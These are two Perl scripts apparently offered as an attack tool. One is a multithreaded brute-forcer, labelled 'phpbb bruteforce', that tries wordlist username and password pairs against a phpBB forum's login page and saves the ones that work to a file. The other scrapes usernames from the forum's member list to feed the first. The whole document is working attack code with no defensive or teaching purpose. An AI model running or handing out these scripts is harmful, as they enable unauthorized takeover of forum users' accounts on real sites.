#! /usr/bin/perl

use LWP::UserAgent;
use HTTP::Cookies;
use threads;
use threads::shared;

if (@ARGV !=3 )
{
&explain;
exit 1; 
}

my @users : shared;
my @passwords : shared;

my $thread_count = 15;
my $forum = $ARGV[0];
open(user_list, "<$ARGV[1]");
@users = <user_list>;
chomp @users;
open(pass_list, "<$ARGV[2]");
@passwords = <pass_list>;
chomp @passwords;

$user_s = scalar @users;
$pass_s = scalar @passwords;
$total = $user_s * $pass_s;

&start();

sub start
{
for (0 .. $thread_count)
{
$threads[$_] = threads->create(\&go, $_);
}
for(@threads) { $_->join(); }
}

sub go
{
while(@users)
{
$user = shift @users;
foreach $password (@passwords)
{
chomp $password;
chomp $user;
$browser = LWP::UserAgent->new();
$browser->cookie_jar( HTTP::Cookies->new());
$html = $browser->post($forum."/login.php", [username => $user, password => $password, autologin => "on", login => "Connect"]);
if ($html->{_rc} == 302)
{
open (good, ">>good.txt");
print good "$forum/login.php - $user;$password\r\n";
close(good);
chomp $user;
print "Current user : $user\n";
}
else
{
open (bad, ">>bad.txt");
print bad "$forum/login.php - $user;$password\r\n";
close(bad);
print "Current user : $user\n";
}
}
}
}

sub explain
{
system "clear";
print qq(
[ phpbb bruteforce by ac1D (c) 2010 ]
[ Using: $0 [forum] [users_list] [pass_list] ]

);
}

#! /usr/bin/perl

use LWP::UserAgent;
use HTTP::Cookies;

open(users, ">>users.txt");

$forum = $ARGV[0];
for ($i=$ARGV[1];$i<$ARGV[2];$i++)
{
$start = $i * 50;
$b = LWP::UserAgent->new();
$html = $b->get("$forum/memberlist.php?start=".$start)->content();
@cnt = split(/\n/, $html);
foreach $str (@cnt)
{
if ($str =~ /"gen">(.*)<\/a><\/span><\/td>/)
{
@user = split(/>/, $1);
print users $user[1]."\r\n";
print $user[1]."\r\n";
}
}
}